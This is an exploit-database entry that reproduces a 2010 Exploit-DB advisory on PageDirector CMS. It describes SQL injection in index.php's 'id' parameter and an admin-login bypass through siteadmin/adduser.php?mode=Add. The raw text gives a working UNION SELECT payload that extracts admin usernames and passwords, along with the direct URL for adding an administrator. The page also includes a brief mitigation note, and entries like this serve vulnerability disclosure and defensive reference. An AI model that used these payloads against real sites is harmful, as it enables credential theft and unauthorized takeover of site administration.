header-logo
Suggest Exploit
vendor:
PageDirector CMS
by:
Tr0y-x
8,8
CVSS
HIGH
SQL Injection, Add Admin
89, 522
CWE
Product Name: PageDirector CMS
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

PageDirector CMS Multiple Vulnerabilities

PageDirector Script Contains A SQL Injection Vulenrability In (Index.php) where an attacker can inject a malicious SQL query in the 'id' parameter. PageDirector Script Can Bypass The Login Page Of Admin And Add A New User by accessing the adduser.php page with the 'mode' parameter set to 'Add'.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a SQL query. Ensure that the login page is properly secured and access to the adduser.php page is restricted.
Source

Exploit-DB raw data:

###################################################################################
# Exploit Title : PageDirector CMS Multiple Vulnerabilities
# Date : 20 - 6 - 2010
# Author : Tr0y-x
# Vendor : www.customerparadigm.com
# Version : All Versions
# Tested on : Linux
# Home : WwW.SeC-WaR.CoM <http://www.sec-war.com/>
# Price : 675.00 $ << loooooolz
###################################################################################

-== SQL Injection Vulenrability ==-

PageDirector Script Contains A SQL Injection Vulenrability In (Index.php)
http://www.[site].com/[path]/index.php?id=[SQL]
[SQL] = UniOn+AlL+SelEct+group_concat(username,0x3e,password)+from+admin--

###################################################################################

-== Add Admin Vulenrability ==-

PageDirector Script Can Bypass The Login Page Of Admin And Add A New User
http://www.[site].com/[path]/siteadmin/adduser.php?mode=Add

###################################################################################

-== Greetz =-

G3n1ux - PrEdAtOr - xXx - Alnjm33 - xR57 - Ahmadso - Jamba - Dr.silent hill

FireStorm - Mr-Alsaeek - Mr.Viktoor

###################################################################################